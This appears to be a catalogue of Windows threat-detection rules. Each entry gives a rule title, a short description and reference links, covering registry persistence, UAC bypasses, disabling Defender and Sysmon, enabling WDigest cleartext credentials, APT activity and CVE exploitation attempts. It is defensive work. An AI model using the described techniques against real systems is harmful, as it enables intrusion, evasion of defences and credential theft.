Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Usage of Renamed Sysinternals Tools - RegistrySet Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution Internal Research
ETW Logging Disabled For rpcrt4.dll Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
Potentially Suspicious Command Executed Via Run Dialog Box - Registry Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://www.forensafe.com/blogs/runmrukey.html, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
ScreenSaver Registry Key Set Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl https://twitter.com/VakninHai/status/1517027824984547329, https://twitter.com/pabraeken/status/998627081360695297, https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
Potential SentinelOne Shell Context Menu Scan Command Tampering Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. https://mrd0x.com/sentinelone-persistence-via-menu-context/
ETW Logging Disabled For SCM Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html
ServiceDll Hijack Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time, https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/
Registry Explorer Policy Modification Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md
Persistence Via New SIP Provider Detects when an attacker register a new SIP provider for persistence and defense evasion https://persistence-info.github.io/Data/codesigning.html, https://github.com/gtworek/PSBits/tree/master/SIP, https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
Tamper With Sophos AV Registry Keys Detects tamper attempts to sophos av functionality via registry key modification https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/
Hiding User Account Via SpecialAccounts Registry Key Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md
Activate Suppression of Windows Security Center Notifications Detect set Notification_Suppress to 1 to disable the Windows security center notification https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md
Suspicious Environment Variable Has Been Registered Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings https://infosec.exchange/@sbousseaden/109542254124022664
Suspicious Keyboard Layout Load Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index, https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
Potential PendingFileRenameOperations Tampering Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot. https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6, https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN, https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html, https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html
Suspicious Printer Driver Empty Manufacturer Detects a suspicious printer driver installation with an empty Manufacturer value https://twitter.com/SBousseaden/status/1410545674773467140
Registry Persistence via Explorer Run Key Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
New RUN Key Pointing to Suspicious Folder Detects suspicious new RUN key element pointing to an executable in a suspicious folder https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
Suspicious Service Installed Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
Modify User Shell Folders Startup Value Detect modification of the startup key to a path where a payload could be stored to be launched during startup https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md
Enable LM Hash Storage Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
Scheduled TaskCache Change by Uncommon Program Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://labs.f-secure.com/blog/scheduled-task-tampering/
Potential Registry Persistence Attempt Via Windows Telemetry Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
RDP Sensitive Settings Changed to Zero Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc. https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services
RDP Sensitive Settings Changed Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services, https://blog.sekoia.io/darkgate-internals/, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry
New TimeProviders Registered With Uncommon DLL Name Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md
Old TLS1.0/TLS1.1 Protocol Version Enabled Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947
COM Hijacking via TreatAs Detect modification of TreatAs key to enable "rundll32.exe -sta" command https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md, https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s
Potential Signing Bypass Via Windows Developer Features - Registry Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. https://twitter.com/malmoeb/status/1560536653709598721, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
UAC Bypass via Event Viewer Detects UAC bypass method using Windows event viewer https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
UAC Bypass via Sdclt Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/, https://github.com/hfiref0x/UACME
UAC Bypass Abusing Winsat Path Parsing - Registry Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - Registry Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) https://github.com/hfiref0x/UACME
UAC Disabled Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
UAC Notification Disabled Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md, https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/
UAC Secure Desktop Prompt Disabled Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md
VBScript Payload Stored in Registry Detects VBScript content stored into registry keys as seen being used by UNC2452 group https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
Wdigest Enable UseLogonCredential Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html, https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649, https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials
Execution DLL of Choice Using WAB.EXE This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml, https://twitter.com/Hexacorn/status/991447379864932352, http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Disable Windows Defender Functionalities Via Registry Keys Detects when attackers or tools disable Windows Defender functionalities via the Windows registry https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html, https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html, https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html, https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/
Winget Admin Settings Modification Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget, https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13
Enable Local Manifest Installation With Winget Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Winlogon Notify Key Logon Persistence Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell
Winlogon AllowMultipleTSSessions Enable Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Sysmon Configuration Change Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Sysmon Configuration Error Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
Sysmon Configuration Modification Detects when an attacker tries to hide from Sysmon by disabling or stopping it https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
Sysmon Blocked Executable Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e
Sysmon Blocked File Shredding Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Sysmon File Executable Creation Detected Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created. https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon, https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36
WMI Event Subscription Detects creation of WMI event subscription persistence method https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected
Suspicious Scripting in a WMI Consumer Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/, https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19, https://github.com/RiccardoAncarani/LiquidSnake
Suspicious Encoded Scripts in a WMI Consumer Detects suspicious encoded payloads in WMI Event Consumers https://github.com/RiccardoAncarani/LiquidSnake
Rejetto HTTP File Server RCE Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287 https://vk9-sec.com/hfs-code-execution-cve-2014-6287/, https://www.exploit-db.com/exploits/39161, https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md
CVE-2010-5278 Exploitation Attempt MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. https://github.com/projectdiscovery/nuclei-templates
ZxShell Malware Detects a ZxShell start by the called and well-known function name https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100, https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf
Turla Group Lateral Movement Detects automated lateral movement by Turla group https://securelist.com/the-epic-turla-operation/65545/
Turla Group Commands May 2020 Detects commands used by Turla group as reported by ESET in May 2020 https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
Exploit for CVE-2015-1641 Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/, https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
Exploit for CVE-2017-0261 Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
Droppers Exploiting CVE-2017-11882 Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100, https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-, https://github.com/embedi/CVE-2017-11882
Exploit for CVE-2017-8759 Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100, https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
Adwind RAT / JRAT Detects javaw.exe in AppData folder as used by Adwind / JRAT https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
CosmicDuke Service Installation Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence. https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
Fireball Archer Install Detects Archer malware invocation via rundll32 https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/, https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
Malware Shellcode in Verclsid Target Process Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro https://twitter.com/JohnLaTwC/status/837743453039534080
NotPetya Ransomware Activity Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil https://securelist.com/schroedingers-petya/78870/, https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
Potential PlugX Activity Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/
StoneDrill Service Install This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
WannaCry Ransomware Activity Detects WannaCry ransomware activity https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
Potential APT10 Cloud Hopper Activity Detects potential process and execution activity related to APT10 Cloud Hopper operation https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
Ps.exe Renamed SysInternals Tool Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report https://www.us-cert.gov/ncas/alerts/TA17-293A
Equation Group C2 Communication Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195
Lazarus System Binary Masquerading Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf
Turla Group Named Pipes Detects a named pipe used by Turla group samples Internal Research, https://attack.mitre.org/groups/G0010/
Turla Service Install This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
Turla PNG Dropper Service This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/
Fortinet CVE-2018-13379 Exploitation Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
Oracle WebLogic Exploit Detects access to a webshell dropped into a keystore folder on the WebLogic server https://twitter.com/pyn3rd/status/1020620932967223296, https://github.com/LandGrey/CVE-2018-2894
Elise Backdoor Activity Detects Elise backdoor activity used by APT32 https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting, https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf
APT27 - Emissary Panda Activity Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965, https://twitter.com/cyb3rops/status/1168863899531132929, https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
Sofacy Trojan Loader Activity Detects Trojan loader activity as used by APT28 https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/, https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110, https://twitter.com/ClearskySec/status/960924755355369472
APT29 2018 Phishing Campaign File Indicators Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
APT29 2018 Phishing Campaign CommandLine Indicators Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
OceanLotus Registry Activity Detects registry keys created in OceanLotus (also known as APT32) attacks https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/, https://github.com/eset/malware-ioc/tree/master/oceanlotus
Potential MuddyWater APT Activity Detects potential Muddywater APT activity https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign
OilRig APT Activity Detects OilRig activity as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Registry Persistence Detects OilRig registry persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Schedule Task Persistence - Security Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
OilRig APT Schedule Task Persistence - System Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
Defrag Deactivation Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group https://securelist.com/apt-slingshot/84312/
Defrag Deactivation - Security Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group https://securelist.com/apt-slingshot/84312/
TropicTrooper Campaign November 2018 Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
Potential BearLPE Exploitation Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp
Pulse Secure Attack CVE-2019-11510 Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole https://www.exploit-db.com/exploits/47297
Exploiting SetupComplete.cmd CVE-2019-1378 Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua
Citrix Netscaler Attack CVE-2019-19781 Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack https://support.citrix.com/article/CTX267679, https://support.citrix.com/article/CTX267027, https://isc.sans.edu/diary/25686, https://twitter.com/mpgn_x64/status/1216787131210829826, https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md
Exploiting CVE-2019-1388 Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388, https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
Potential Baby Shark Malware Activity Detects activity that could be related to Baby Shark malware https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
Confluence Exploitation CVE-2019-3398 Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181
